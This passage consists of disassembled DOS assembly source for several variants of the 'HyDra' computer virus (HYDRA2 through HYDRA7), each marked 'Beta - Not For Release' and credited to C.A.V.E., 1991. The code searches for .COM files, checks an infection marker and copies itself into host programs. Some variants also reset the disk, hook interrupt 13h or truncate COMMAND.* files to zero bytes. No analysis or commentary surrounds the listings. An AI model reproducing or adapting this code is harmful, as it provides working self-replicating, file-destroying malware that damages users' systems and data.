  959.         int    21h            ; DOS Services  ah=function 4Fh
  960.                         ;  find next filename match
  961.         jc    loc_6            ; Jump if carry Set
  962.         jmp    short loc_2
  963. loc_3:
  964.         xor    cx,cx            ; Zero register
  965.         mov    dx,cx
  966.         mov    ax,4200h
  967.         int    21h            ; DOS Services  ah=function 42h
  968.                         ;  move file ptr, bx=file handle
  969.                         ;   al=method, cx,dx=offset
  970.         jc    loc_4            ; Jump if carry Set
  971.         mov    ah,40h            ; '@'
  972.         xor    dx,dx            ; Zero register
  973.         mov    cx,cs:data_12
  974.         int    21h            ; DOS Services  ah=function 40h
  975.                         ;  write file  bx=file handle
  976.                         ;   cx=bytes from ds:dx buffer
  977. loc_4:
  978.         mov    ah,3Eh            ; '>'
  979.         int    21h            ; DOS Services  ah=function 3Eh
  980.                         ;  close file, bx=file handle
  981.         push    cs
  982.         pop    ds
  983. loc_5:
  984.         mov    ah,1Ah
  985.         mov    dx,psp_cmd_size
  986.         int    21h            ; DOS Services  ah=function 1Ah
  987.                         ;  set DTA(disk xfer area) ds:dx
  988.         jmp    short loc_7
  989.         nop
  990. loc_6:
  991.         push    dx
  992.         xor    ax,ax            ; Zero register
  993.         xor    ax,ax            ; Zero register
  994.         mov    ds,ax
  995.         mov    bx,data_4e
  996.         mov    ah,0FFh
  997.         mov    [bx],ah
  998.         xor    ax,ax            ; Zero register
  999.         int    13h            ; Disk  dl=drive 0  ah=func 00h
  1000.                         ;  reset disk, al=return status
  1001.         mov    ax,0
  1002.         int    21h            ; DOS Services  ah=function 00h
  1003.                         ;  terminate, cs=progm seg prefx
  1004. loc_7:
  1005.         xor    di,di            ; Zero register
  1006.         mov    si,data_2e
  1007.         mov    cx,22h
  1008.         rep    movsb            ; Rep when cx >0 Mov [si] to es:[di]
  1009.         pop    bx
  1010.         mov    cs:data_10,0
  1011.         mov    word ptr cs:data_10+2,es
  1012.         pop    bx
  1013.         jmp    dword ptr cs:data_10
  1014.         push    ds
  1015.         pop    es
  1016.         mov    cx,0FFFFh
  1017.         mov    si,data_3e
  1018.         mov    di,data_1e
  1019.         sub    cx,si
  1020.         rep    movsb            ; Rep when cx >0 Mov [si] to es:[di]
  1021.         mov    word ptr cs:[100h],100h
  1022.         mov    word ptr cs:[102h],ds
  1023.         mov    ax,bx
  1024.         jmp    dword ptr cs:[100h]
  1025.         int    20h            ; DOS program terminate
  1026.  
  1027. hydra2        endp
  1028.  
  1029. seg_a        ends
  1030.  
  1031.  
  1032.  
  1033.         end    start
  1034.  
  1035. done
  1036.  
  1037. ;██████████████████████████████████████████████████████████████████████████
  1038. ;██                                         ██
  1039. ;██                    HYDRA3                         ██
  1040. ;██                                         ██
  1041. ;██      Created:   27-Aug-91                             ██
  1042. ;██      Passes:    5           Analysis Options on: AW                 ██
  1043. ;██      Copyright (c)                                 ██
  1044. ;██                                         ██
  1045. ;██████████████████████████████████████████████████████████████████████████
  1046.  
  1047. psp_cmd_size    equ    80h
  1048. data_11e    equ    100h
  1049. data_12e    equ    156h
  1050. data_13e    equ    159h
  1051. data_14e    equ    234h
  1052. data_15e    equ    256h
  1053.  
  1054. seg_a        segment    byte public
  1055.         assume    cs:seg_a, ds:seg_a
  1056.  
  1057.  
  1058.         org    100h
  1059.  
  1060. hydra3        proc    far
  1061.  
  1062. start:
  1063.         jmp    loc_1
  1064.         pop    cx
  1065.         inc    sp
  1066.         add    [bx+si],al
  1067. data_3        db    'HyDra-3   Beta - Not For Release'
  1068.         db    '. *.CO?'
  1069.         db    0
  1070. data_6        dw    0, 8B39h
  1071. data_8        dw    0
  1072. data_9        db    0
  1073.         db    29 dup (0)
  1074. data_10        db    0
  1075.         db    13 dup (0)
  1076. copyright    db    'Copyright (c)'
  1077.         db    '  1991 by C.A.V.E.  '
  1078. loc_1:
  1079.         push    ax
  1080.         mov    ax,cs
  1081.         add    ax,1000h
  1082.         xor    di,di            ; Zero register
  1083.         mov    cx,156h
  1084.         mov    si,100h
  1085.         mov    es,ax
  1086.         rep    movsb            ; Rep when cx >0 Mov [si] to es:[di]
  1087.         mov    ah,1Ah
  1088.         mov    dx,offset data_9
  1089.         int    21h            ; DOS Services  ah=function 1Ah
  1090.                         ;  set DTA(disk xfer area) ds:dx
  1091.         mov    ah,4Eh            ; 'N'
  1092.         mov    dx,offset data_3+22h    ; ('*')
  1093.         int    21h            ; DOS Services  ah=function 4Eh
  1094.                         ;  find 1st filenam match @ds:dx
  1095.         jc    loc_5            ; Jump if carry Set
  1096. loc_2:
  1097.         mov    ah,3Dh            ; '='
  1098.         mov    al,2
  1099.         mov    dx,offset data_10
  1100.         mov    al,2
  1101.         int    21h            ; DOS Services  ah=function 3Dh
  1102.                         ;  open file, al=mode,name@ds:dx
  1103.         mov    bx,ax
  1104.         push    es
  1105.         pop    ds
  1106.         mov    ax,3F00h
  1107.         mov    cx,0FFFFh
  1108.         mov    dx,data_12e
  1109.         int    21h            ; DOS Services  ah=function 3Fh
  1110.                         ;  read file, bx=file handle
  1111.                         ;   cx=bytes to ds:dx buffer
  1112.         add    ax,156h
  1113.         mov    cs:data_8,ax
  1114.         cmp    word ptr ds:data_13e,4459h
  1115.         jne    loc_3            ; Jump if not equal
  1116.         mov    ah,3Eh            ; '>'
  1117.         int    21h            ; DOS Services  ah=function 3Eh
  1118.                         ;  close file, bx=file handle
  1119.         push    cs
  1120.         pop    ds
  1121.         mov    ah,4Fh            ; 'O'
  1122.         int    21h            ; DOS Services  ah=function 4Fh
  1123.                         ;  find next filename match
  1124.         jc    loc_6            ; Jump if carry Set
  1125.         jmp    short loc_2
  1126. loc_3:
  1127.         xor    cx,cx            ; Zero register
  1128.         mov    dx,cx
  1129.         mov    ax,4200h
  1130.         int    21h            ; DOS Services  ah=function 42h
  1131.                         ;  move file ptr, bx=file handle
  1132.                         ;   al=method, cx,dx=offset
  1133.         jc    loc_4            ; Jump if carry Set
  1134.         mov    ah,40h            ; '@'
  1135.         xor    dx,dx            ; Zero register
  1136.         mov    cx,cs:data_8
  1137.         int    21h            ; DOS Services  ah=function 40h
  1138.                         ;  write file  bx=file handle
  1139.                         ;   cx=bytes from ds:dx buffer
  1140. loc_4:
  1141.         mov    ah,3Eh            ; '>'
  1142.         int    21h            ; DOS Services  ah=function 3Eh
  1143.                         ;  close file, bx=file handle
  1144.         push    cs
  1145.         pop    ds
  1146. loc_5:
  1147.         mov    ah,1Ah
  1148.         mov    dx,psp_cmd_size
  1149.         int    21h            ; DOS Services  ah=function 1Ah
  1150.                         ;  set DTA(disk xfer area) ds:dx
  1151.         jmp    short loc_7
  1152.         nop
  1153. loc_6:
  1154.         push    dx
  1155.         mov    ax,3504h
  1156.         int    21h            ; DOS Services  ah=function 35h
  1157.                         ;  get intrpt vector al in es:bx
  1158.         mov    ax,es
  1159.         mov    dx,bx
  1160.         mov    ds,ax
  1161.         mov    ax,2513h
  1162.         int    21h            ; DOS Services  ah=function 25h
  1163.                         ;  set intrpt vector al to ds:dx
  1164.         mov    ax,0
  1165.         int    21h            ; DOS Services  ah=function 00h
  1166.                         ;  terminate, cs=progm seg prefx
  1167. loc_7:
  1168.         xor    di,di            ; Zero register
  1169.         mov    si,data_14e
  1170.         mov    cx,22h
  1171.         rep    movsb            ; Rep when cx >0 Mov [si] to es:[di]
  1172.         pop    bx
  1173.         mov    cs:data_6,0
  1174.         mov    word ptr cs:data_6+2,es
  1175.         pop    bx
  1176.         jmp    dword ptr cs:data_6
  1177.         push    ds
  1178.         pop    es
  1179.         mov    cx,0FFFFh
  1180.         mov    si,data_15e
  1181.         mov    di,data_11e
  1182.         sub    cx,si
  1183.         rep    movsb            ; Rep when cx >0 Mov [si] to es:[di]
  1184.         mov    word ptr cs:[100h],100h
  1185.         mov    word ptr cs:[102h],ds
  1186.         mov    ax,bx
  1187.         jmp    dword ptr cs:[100h]
  1188.         int    20h            ; DOS program terminate
  1189.  
  1190. hydra3        endp
  1191.  
  1192. seg_a        ends
  1193.  
  1194.  
  1195.  
  1196.         end    start
  1197.  
  1198. done
  1199.  
  1200. ;██████████████████████████████████████████████████████████████████████████
  1201. ;██                                         ██
  1202. ;██                    HYDRA4                         ██
  1203. ;██                                         ██
  1204. ;██      Created:   28-Aug-91                             ██
  1205. ;██      Passes:    5           Analysis Options on: AW                 ██
  1206. ;██      Copyright (c)                                 ██
  1207. ;██                                         ██
  1208. ;██████████████████████████████████████████████████████████████████████████
  1209.  
  1210. psp_cmd_size    equ    80h
  1211. data_11e    equ    100h
  1212. data_12e    equ    154h
  1213. data_13e    equ    157h
  1214. data_14e    equ    232h
  1215. data_15e    equ    254h
  1216.  
  1217. seg_a        segment    byte public
  1218.         assume    cs:seg_a, ds:seg_a
  1219.  
  1220.  
  1221.         org    100h
  1222.  
  1223. hydra4        proc    far
  1224.  
  1225. start:
  1226.         jmp    loc_1
  1227.         pop    cx
  1228.         inc    sp
  1229.         add    [bx+si],al
  1230. data_3        db    'HyDra-4   Beta - Not For Release'
  1231.         db    '. *.CO?'
  1232.         db    0
  1233. data_6        dw    0, 8B39h
  1234. data_8        dw    0
  1235. data_9        db    0
  1236.         db    29 dup (0)
  1237. data_10        db    0
  1238.         db    13 dup (0)
  1239. copyright    db    'Copyright (c)'
  1240.         db    '  1991 by C.A.V.E.  '
  1241. loc_1:
  1242.         push    ax
  1243.         mov    ax,cs
  1244.         add    ax,1000h
  1245.         xor    di,di            ; Zero register
  1246.         mov    cx,154h
  1247.         mov    si,100h
  1248.         mov    es,ax
  1249.         rep    movsb            ; Rep when cx >0 Mov [si] to es:[di]
  1250.         mov    ah,1Ah
  1251.         mov    dx,offset data_9
  1252.         int    21h            ; DOS Services  ah=function 1Ah
  1253.                         ;  set DTA(disk xfer area) ds:dx
  1254.         mov    ah,4Eh            ; 'N'
  1255.         mov    dx,offset data_3+22h    ; ('*')
  1256.         int    21h            ; DOS Services  ah=function 4Eh
  1257.                         ;  find 1st filenam match @ds:dx
  1258.         jc    loc_5            ; Jump if carry Set
  1259. loc_2:
  1260.         mov    ah,3Dh            ; '='
  1261.         mov    al,2
  1262.         mov    dx,offset data_10
  1263.         mov    al,2
  1264.         int    21h            ; DOS Services  ah=function 3Dh
  1265.                         ;  open file, al=mode,name@ds:dx
  1266.         mov    bx,ax
  1267.         push    es
  1268.         pop    ds
  1269.         mov    ax,3F00h
  1270.         mov    cx,0FFFFh
  1271.         mov    dx,data_12e
  1272.         int    21h            ; DOS Services  ah=function 3Fh
  1273.                         ;  read file, bx=file handle
  1274.                         ;   cx=bytes to ds:dx buffer
  1275.         add    ax,154h
  1276.         mov    cs:data_8,ax
  1277.         cmp    word ptr ds:data_13e,4459h
  1278.         jne    loc_3            ; Jump if not equal
  1279.         mov    ah,3Eh            ; '>'
  1280.         int    21h            ; DOS Services  ah=function 3Eh
  1281.                         ;  close file, bx=file handle
  1282.         push    cs
  1283.         pop    ds
  1284.         mov    ah,4Fh            ; 'O'
  1285.         int    21h            ; DOS Services  ah=function 4Fh
  1286.                         ;  find next filename match
  1287.         jc    loc_6            ; Jump if carry Set
  1288.         jmp    short loc_2
  1289. loc_3:
  1290.         xor    cx,cx            ; Zero register
  1291.         mov    dx,cx
  1292.         mov    ax,4200h
  1293.         int    21h            ; DOS Services  ah=function 42h
  1294.                         ;  move file ptr, bx=file handle
  1295.                         ;   al=method, cx,dx=offset
  1296.         jc    loc_4            ; Jump if carry Set
  1297.         mov    ah,40h            ; '@'
  1298.         xor    dx,dx            ; Zero register
  1299.         mov    cx,cs:data_8
  1300.         int    21h            ; DOS Services  ah=function 40h
  1301.                         ;  write file  bx=file handle
  1302.                         ;   cx=bytes from ds:dx buffer
  1303. loc_4:
  1304.         mov    ah,3Eh            ; '>'
  1305.         int    21h            ; DOS Services  ah=function 3Eh
  1306.                         ;  close file, bx=file handle
  1307.         push    cs
  1308.         pop    ds
  1309. loc_5:
  1310.         mov    ah,1Ah
  1311.         mov    dx,psp_cmd_size
  1312.         int    21h            ; DOS Services  ah=function 1Ah
  1313.                         ;  set DTA(disk xfer area) ds:dx
  1314.         jmp    short loc_7
  1315.         nop
  1316. loc_6:
  1317.         push    dx
  1318.         mov    ax,3540h
  1319.         int    21h            ; DOS Services  ah=function 35h
  1320.                         ;  get intrpt vector al in es:bx
  1321.         mov    dx,bx
  1322.         push    es
  1323.         pop    ds
  1324.         mov    ax,2513h
  1325.         int    21h            ; DOS Services  ah=function 25h
  1326.                         ;  set intrpt vector al to ds:dx
  1327.         mov    ax,0
  1328.         int    21h            ; DOS Services  ah=function 00h
  1329.                         ;  terminate, cs=progm seg prefx
  1330. loc_7:
  1331.         xor    di,di            ; Zero register
  1332.         mov    si,data_14e
  1333.         mov    cx,22h
  1334.         rep    movsb            ; Rep when cx >0 Mov [si] to es:[di]
  1335.         pop    bx
  1336.         mov    cs:data_6,0
  1337.         mov    word ptr cs:data_6+2,es
  1338.         pop    bx
  1339.         jmp    dword ptr cs:data_6
  1340.         push    ds
  1341.         pop    es
  1342.         mov    cx,0FFFFh
  1343.         mov    si,data_15e
  1344.         mov    di,data_11e
  1345.         sub    cx,si
  1346.         rep    movsb            ; Rep when cx >0 Mov [si] to es:[di]
  1347.         mov    word ptr cs:[100h],100h
  1348.         mov    word ptr cs:[102h],ds
  1349.         mov    ax,bx
  1350.         jmp    dword ptr cs:[100h]
  1351.         int    20h            ; DOS program terminate
  1352.  
  1353. hydra4        endp
  1354.  
  1355. seg_a        ends
  1356.  
  1357.  
  1358.  
  1359.         end    start
  1360.  
  1361. done
  1362.  
  1363. ;██████████████████████████████████████████████████████████████████████████
  1364. ;██                                         ██
  1365. ;██                    HYDRA5                         ██
  1366. ;██                                         ██
  1367. ;██      Created:   21-Aug-91                             ██
  1368. ;██      Passes:    5           Analysis Options on: AW                 ██
  1369. ;██      Copyright (c)                                 ██
  1370. ;██                                         ██
  1371. ;██████████████████████████████████████████████████████████████████████████
  1372.  
  1373. data_1e        equ    23Eh
  1374. psp_cmd_size    equ    80h
  1375. data_17e    equ    187h
  1376. data_18e    equ    18Ah
  1377.  
  1378. seg_a        segment    byte public
  1379.         assume    cs:seg_a, ds:seg_a
  1380.  
  1381.  
  1382.         org    100h
  1383.  
  1384. hydra5        proc    far
  1385.  
  1386. start:
  1387.         jmp    loc_1
  1388.         pop    cx
  1389.         inc    sp
  1390.         add    [bx+si],al
  1391. data_4        db    'HyDra-5   Beta - Not For Release'
  1392.         db    '. *.CO?'
  1393.         db    0
  1394. data_7        dw    0, 8B39h
  1395. data_9        dw    0
  1396. data_10        db    0
  1397.         db    29 dup (0)
  1398. data_11        db    0
  1399.         db    13 dup (0)
  1400. copyright    db    'Copyright (c)'
  1401.         db    '  1991 by C.A.V.E.  '
  1402. loc_1:
  1403.         push    ax
  1404.         mov    ax,cs
  1405.         add    ax,1000h
  1406.         xor    di,di            ; Zero register
  1407.         mov    cx,187h
  1408.         mov    si,100h
  1409.         mov    es,ax
  1410.         rep    movsb            ; Rep when cx >0 Mov [si] to es:[di]
  1411.         mov    ah,1Ah
  1412.         mov    dx,offset data_10
  1413.         int    21h            ; DOS Services  ah=function 1Ah
  1414.                         ;  set DTA(disk xfer area) ds:dx
  1415.         mov    ah,4Eh            ; 'N'
  1416.         mov    dx,offset data_4+22h    ; ('*')
  1417.         int    21h            ; DOS Services  ah=function 4Eh
  1418.                         ;  find 1st filenam match @ds:dx
  1419.         jc    loc_5            ; Jump if carry Set
  1420. loc_2:
  1421.         mov    ah,3Dh            ; '='
  1422.         mov    al,2
  1423.         mov    dx,offset data_11
  1424.         mov    al,2
  1425.         int    21h            ; DOS Services  ah=function 3Dh
  1426.                         ;  open file, al=mode,name@ds:dx
  1427.         mov    bx,ax
  1428.         push    es
  1429.         pop    ds
  1430.         mov    ax,3F00h
  1431.         mov    cx,0FFFFh
  1432.         mov    dx,data_17e
  1433.         int    21h            ; DOS Services  ah=function 3Fh
  1434.                         ;  read file, bx=file handle
  1435.                         ;   cx=bytes to ds:dx buffer
  1436.         add    ax,187h
  1437.         mov    cs:data_9,ax
  1438.         cmp    word ptr ds:data_18e,4459h
  1439.         jne    loc_3            ; Jump if not equal
  1440.         mov    ah,3Eh            ; '>'
  1441.         int    21h            ; DOS Services  ah=function 3Eh
  1442.                         ;  close file, bx=file handle
  1443.         push    cs
  1444.         pop    ds
  1445.         mov    ah,4Fh            ; 'O'
  1446.         int    21h            ; DOS Services  ah=function 4Fh
  1447.                         ;  find next filename match
  1448. ;*        jc    loc_6            ; Jump if carry Set
  1449.         db     72h, 54h
  1450.         jmp    short loc_2
  1451. loc_3:
  1452.         xor    cx,cx            ; Zero register
  1453.         mov    dx,cx
  1454.         mov    ax,4200h
  1455.         int    21h            ; DOS Services  ah=function 42h
  1456.                         ;  move file ptr, bx=file handle
  1457.                         ;   al=method, cx,dx=offset
  1458.         jc    loc_4            ; Jump if carry Set
  1459.         mov    ah,40h            ; '@'
  1460.         xor    dx,dx            ; Zero register
  1461.         mov    cx,cs:data_9
  1462.         int    21h            ; DOS Services  ah=function 40h
  1463.                         ;  write file  bx=file handle
  1464.                         ;   cx=bytes from ds:dx buffer
  1465. loc_4:
  1466.         mov    ah,3Eh            ; '>'
  1467.         int    21h            ; DOS Services  ah=function 3Eh
  1468.                         ;  close file, bx=file handle
  1469.         push    cs
  1470.         pop    ds
  1471. loc_5:
  1472.         mov    ah,1Ah
  1473.         mov    dx,psp_cmd_size
  1474.         int    21h            ; DOS Services  ah=function 1Ah
  1475.                         ;  set DTA(disk xfer area) ds:dx
  1476.         jmp    short loc_7
  1477.         nop
  1478.         inc    word ptr [bx+si]
  1479.         add    [bx+si],al
  1480.         add    [bx+si],al
  1481.         pop    ds
  1482.         add    [bx],bh
  1483.         aas                ; Ascii adjust
  1484.         aas                ; Ascii adjust
  1485.         aas                ; Ascii adjust
  1486.         aas                ; Ascii adjust
  1487.         aas                ; Ascii adjust
  1488.         aas                ; Ascii adjust
  1489.         aas                ; Ascii adjust
  1490.         inc    bp
  1491.         pop    ax
  1492.         inc    bp
  1493.         add    [bx+si],al
  1494.         add    [bx+si],al
  1495.         add    [bx+si],al
  1496.         add    [bx+si],al
  1497.         add    [bx+si],al
  1498.         add    [bx+si],al
  1499.         add    [bx+si],al
  1500.         add    [bx+si],al
  1501.         add    [bx+si],al
  1502.         add    [bx+si],al
  1503.         add    [bx+si],al
  1504.         add    [bx+si],al
  1505.         add    ds:data_1e[bx+si],bh
  1506.         push    ax
  1507.         push    cs
  1508.         pushf                ; Push flags
  1509.         mov    cl,13h
  1510.         mov    dx,201h
  1511.         push    cs
  1512.         pop    ds
  1513.         jmp    dword ptr data_14
  1514.         mov    ah,4Ch            ; 'L'
  1515.         int    21h            ; DOS Services  ah=function 4Ch
  1516.                         ;  terminate with al=return code
  1517. data_14        dd    000C0h
  1518.         db    0CDh, 20h
  1519. loc_7:
  1520.         xor    di,di            ; Zero register
  1521.         mov    si,265h
  1522.         mov    cx,22h
  1523.         rep    movsb            ; Rep when cx >0 Mov [si] to es:[di]
  1524.         pop    bx
  1525.         mov    cs:data_7,0
  1526.         mov    word ptr cs:data_7+2,es
  1527.         pop    bx
  1528.         jmp    dword ptr cs:data_7
  1529.         push    ds
  1530.         pop    es
  1531.         mov    cx,0FFFFh
  1532.         mov    si,287h
  1533.         mov    di,100h
  1534.         sub    cx,si
  1535.         rep    movsb            ; Rep when cx >0 Mov [si] to es:[di]
  1536.         mov    word ptr cs:[100h],100h
  1537.         mov    word ptr cs:[102h],ds
  1538.         mov    ax,bx
  1539.         jmp    dword ptr cs:[100h]
  1540.         int    20h            ; DOS program terminate
  1541.  
  1542. hydra5        endp
  1543.  
  1544. seg_a        ends
  1545.  
  1546.  
  1547.  
  1548.         end    start
  1549.  
  1550. done
  1551.  
  1552. ;██████████████████████████████████████████████████████████████████████████
  1553. ;██                                         ██
  1554. ;██                    HYDRA6                         ██
  1555. ;██                                         ██
  1556. ;██      Created:   27-Aug-91                             ██
  1557. ;██      Passes:    5           Analysis Options on: AW                 ██
  1558. ;██      Copyright (c)                                 ██
  1559. ;██                                         ██
  1560. ;██████████████████████████████████████████████████████████████████████████
  1561.  
  1562. psp_cmd_size    equ    80h
  1563. data_14e    equ    174h
  1564. data_15e    equ    177h
  1565.  
  1566. seg_a        segment    byte public
  1567.         assume    cs:seg_a, ds:seg_a
  1568.  
  1569.  
  1570.         org    100h
  1571.  
  1572. hydra6        proc    far
  1573.  
  1574. start:
  1575.         jmp    loc_1
  1576.         pop    cx
  1577.         inc    sp
  1578.         add    [bx+si],al
  1579. data_3        db    'HyDra-6   Beta - Not For Release'
  1580.         db    '. *.CO?'
  1581.         db    0
  1582. data_6        dw    0, 8B39h
  1583. data_8        dw    0
  1584. data_9        db    0
  1585.         db    29 dup (0)
  1586. data_10        db    0
  1587.         db    13 dup (0)
  1588. copyright    db    'Copyright (c)'
  1589.         db    '  1991 by C.A.V.E.  '
  1590. data_11        db    'COMMAND.*', 0
  1591. loc_1:
  1592.         push    ax
  1593.         mov    ax,cs
  1594.         add    ax,1000h
  1595.         xor    di,di            ; Zero register
  1596.         mov    cx,174h
  1597.         mov    si,100h
  1598.         mov    es,ax
  1599.         rep    movsb            ; Rep when cx >0 Mov [si] to es:[di]
  1600.         mov    ah,1Ah
  1601.         mov    dx,offset data_9
  1602.         int    21h            ; DOS Services  ah=function 1Ah
  1603.                         ;  set DTA(disk xfer area) ds:dx
  1604.         mov    ah,4Eh            ; 'N'
  1605.         mov    dx,offset data_3+22h    ; ('*')
  1606.         int    21h            ; DOS Services  ah=function 4Eh
  1607.                         ;  find 1st filenam match @ds:dx
  1608.         jc    loc_5            ; Jump if carry Set
  1609. loc_2:
  1610.         mov    ah,3Dh            ; '='
  1611.         mov    al,2
  1612.         mov    dx,offset data_10
  1613.         int    21h            ; DOS Services  ah=function 3Dh
  1614.                         ;  open file, al=mode,name@ds:dx
  1615.         mov    bx,ax
  1616.         push    es
  1617.         pop    ds
  1618.         mov    ax,3F00h
  1619.         mov    cx,0FFFFh
  1620.         mov    dx,data_14e
  1621.         int    21h            ; DOS Services  ah=function 3Fh
  1622.                         ;  read file, bx=file handle
  1623.                         ;   cx=bytes to ds:dx buffer
  1624.         add    ax,174h
  1625.         mov    cs:data_8,ax
  1626.         cmp    word ptr ds:data_15e,4459h
  1627.         jne    loc_3            ; Jump if not equal
  1628.         mov    ah,3Eh            ; '>'
  1629.         int    21h            ; DOS Services  ah=function 3Eh
  1630.                         ;  close file, bx=file handle
  1631.         push    cs
  1632.         pop    ds
  1633.         mov    ah,4Fh            ; 'O'
  1634.         int    21h            ; DOS Services  ah=function 4Fh
  1635.                         ;  find next filename match
  1636.         jc    loc_6            ; Jump if carry Set
  1637.         jmp    short loc_2
  1638. loc_3:
  1639.         xor    cx,cx            ; Zero register
  1640.         mov    dx,cx
  1641.         mov    ax,4200h
  1642.         int    21h            ; DOS Services  ah=function 42h
  1643.                         ;  move file ptr, bx=file handle
  1644.                         ;   al=method, cx,dx=offset
  1645.         jc    loc_4            ; Jump if carry Set
  1646.         mov    ah,40h            ; '@'
  1647.         xor    dx,dx            ; Zero register
  1648.         mov    cx,cs:data_8
  1649.         int    21h            ; DOS Services  ah=function 40h
  1650.                         ;  write file  bx=file handle
  1651.                         ;   cx=bytes from ds:dx buffer
  1652. loc_4:
  1653.         mov    ah,3Eh            ; '>'
  1654.         int    21h            ; DOS Services  ah=function 3Eh
  1655.                         ;  close file, bx=file handle
  1656.         push    cs
  1657.         pop    ds
  1658. loc_5:
  1659.         mov    ah,1Ah
  1660.         mov    dx,psp_cmd_size
  1661.         int    21h            ; DOS Services  ah=function 1Ah
  1662.                         ;  set DTA(disk xfer area) ds:dx
  1663.         jmp    short loc_8
  1664.         nop
  1665. loc_6:
  1666.         mov    ah,1Ah
  1667.         mov    dx,offset data_9
  1668.         int    21h            ; DOS Services  ah=function 1Ah
  1669.                         ;  set DTA(disk xfer area) ds:dx
  1670.         push    dx
  1671.         mov    dx,offset data_11    ; ('COMMAND.*')
  1672.         mov    ah,4Eh            ; 'N'
  1673.         xor    cx,cx            ; Zero register
  1674.         int    21h            ; DOS Services  ah=function 4Eh
  1675.                         ;  find 1st filenam match @ds:dx
  1676.         jc    loc_5            ; Jump if carry Set
  1677. loc_7:
  1678.         mov    ah,3Ch            ; '<'
  1679.         xor    cx,cx            ; Zero register
  1680.         mov    dx,offset data_10
  1681.         int    21h            ; DOS Services  ah=function 3Ch
  1682.                         ;  create/truncate file @ ds:dx
  1683.         mov    bx,ax
  1684.         jc    loc_5            ; Jump if carry Set
  1685.         mov    ah,3Eh            ; '>'
  1686.         int    21h            ; DOS Services  ah=function 3Eh
  1687.                         ;  close file, bx=file handle
  1688.         jc    loc_5            ; Jump if carry Set
  1689.         mov    ah,4Fh            ; 'O'
  1690.         int    21h            ; DOS Services  ah=function 4Fh
  1691.                         ;  find next filename match
  1692.         jnc    loc_7            ; Jump if carry=0
  1693. loc_8:
  1694.         xor    di,di            ; Zero register
  1695.         mov    si,252h
  1696.         mov    cx,22h
  1697.         rep    movsb            ; Rep when cx >0 Mov [si] to es:[di]
  1698.         pop    bx
  1699.         mov    cs:data_6,0
  1700.         mov    word ptr cs:data_6+2,es
  1701.         pop    bx
  1702.         jmp    dword ptr cs:data_6
  1703.         push    ds
  1704.         pop    es
  1705.         mov    cx,0FFFFh
  1706.         mov    si,274h
  1707.         mov    di,100h
  1708.         sub    cx,si
  1709.         rep    movsb            ; Rep when cx >0 Mov [si] to es:[di]
  1710.         mov    word ptr cs:[100h],100h
  1711.         mov    word ptr cs:[102h],ds
  1712.         mov    ax,bx
  1713.         jmp    dword ptr cs:[100h]
  1714.         int    20h            ; DOS program terminate
  1715.  
  1716. hydra6        endp
  1717.  
  1718. seg_a        ends
  1719.  
  1720.  
  1721.  
  1722.         end    start
  1723.  
  1724. done
  1725.  
  1726. ;██████████████████████████████████████████████████████████████████████████
  1727. ;██                                         ██
  1728. ;██                    HYDRA7                         ██
  1729. ;██                                         ██
  1730. ;██      Created:   27-Aug-91                             ██
  1731. ;██      Passes:    5           Analysis Options on: AW                 ██
  1732. ;██      Copyright (c)                                 ██
  1733. ;██                                         ██
  1734. ;██████████████████████████████████████████████████████████████████████████
  1735.  
  1736. psp_cmd_size    equ    80h
  1737. data_16e    equ    170h
  1738. data_17e    equ    173h
  1739.  
  1740. seg_a        segment    byte public
  1741.         assume    cs:seg_a, ds:seg_a
  1742.  
  1743.  
  1744.         org    100h
  1745.  
  1746. hydra7        proc    far
  1747.  
  1748. start:
  1749.         jmp    loc_1
  1750.         pop    cx
  1751.         inc    sp
  1752.         add    [bx+si],al
  1753. data_4        db    'HyDra-7   Beta - Not For Release'
  1754.         db    '. *.CO?'
  1755.         db    0
  1756. data_7        dw    0, 8B39h
  1757. data_9        dw    0
  1758. data_10        db    0
  1759.         db    29 dup (0)
  1760. data_11        db    0
  1761.         db    13 dup (0)
  1762. copyright    db    'Copyright (c)'
  1763.         db    '  1991 by C.A.V.E.  '
  1764. data_12        db    2Ah
  1765.         db     2Eh, 45h, 58h, 45h, 00h
  1766. loc_1:
  1767.         push    ax
  1768.         mov    ax,cs
  1769.         add    ax,1000h
  1770.         xor    di,di            ; Zero register
  1771.         mov    cx,170h
  1772.         mov    si,100h
  1773.         mov    es,ax
  1774.         rep    movsb            ; Rep when cx >0 Mov [si] to es:[di]
  1775.         mov    ah,1Ah
  1776.         mov    dx,offset data_10
  1777.         int    21h            ; DOS Services  ah=function 1Ah
  1778.                         ;  set DTA(disk xfer area) ds:dx
  1779.         mov    ah,4Eh            ; 'N'
  1780.         mov    dx,offset data_4+22h    ; ('*')
  1781.         int    21h            ; DOS Services  ah=function 4Eh
  1782.                         ;  find 1st filenam match @ds:dx
  1783.         jc    loc_5            ; Jump if carry Set
  1784. loc_2:
  1785.         mov    ah,3Dh            ; '='
  1786.         mov    al,2
  1787.         mov    dx,offset data_11
  1788.         int    21h            ; DOS Services  ah=function 3Dh
  1789.                         ;  open file, al=mode,name@ds:dx
  1790.         mov    bx,ax
  1791.         push    es
  1792.         pop    ds
  1793.         mov    ax,3F00h
  1794.         mov    cx,0FFFFh
  1795.         mov    dx,data_16e
  1796.         int    21h            ; DOS Services  ah=function 3Fh
  1797.                         ;  read file, bx=file handle
  1798.                         ;   cx=bytes to ds:dx buffer
  1799.         add    ax,170h
  1800.         mov    cs:data_9,ax
  1801.         cmp    word ptr ds:data_17e,4459h
  1802.         jne    loc_3            ; Jump if not equal
  1803.         mov    ah,3Eh            ; '>'
  1804.         int    21h            ; DOS Services  ah=function 3Eh
  1805.                         ;  close file, bx=file handle
  1806.         push    cs
  1807.         pop    ds
  1808.         mov    ah,4Fh            ; 'O'
  1809.         int    21h            ; DOS Services  ah=function 4Fh
  1810.                         ;  find next filename match
  1811.         jc    loc_6            ; Jump if carry Set
  1812.         jmp    short loc_2
  1813. loc_3:
  1814.         xor    cx,cx            ; Zero register
  1815.         mov    dx,cx
  1816.         mov    ax,4200h
  1817.         int    21h            ; DOS Services  ah=function 42h
  1818.                         ;  move file ptr, bx=file handle
  1819.                         ;   al=method, cx,dx=offset
  1820.         jc    loc_4            ; Jump if carry Set
  1821.         mov    ah,40h            ; '@'
  1822.         xor    dx,dx            ; Zero register
  1823.         mov    cx,cs:data_9
  1824.         int    21h            ; DOS Services  ah=function 40h
  1825.                         ;  write file  bx=file handle
  1826.                         ;   cx=bytes from ds:dx buffer
  1827. loc_4:
  1828.         mov    ah,3Eh            ; '>'
  1829.         int    21h            ; DOS Services  ah=function 3Eh
  1830.                         ;  close file, bx=file handle
  1831.         push    cs
  1832.         pop    ds
  1833. loc_5:
  1834.         mov    ah,1Ah
  1835.         mov    dx,psp_cmd_size
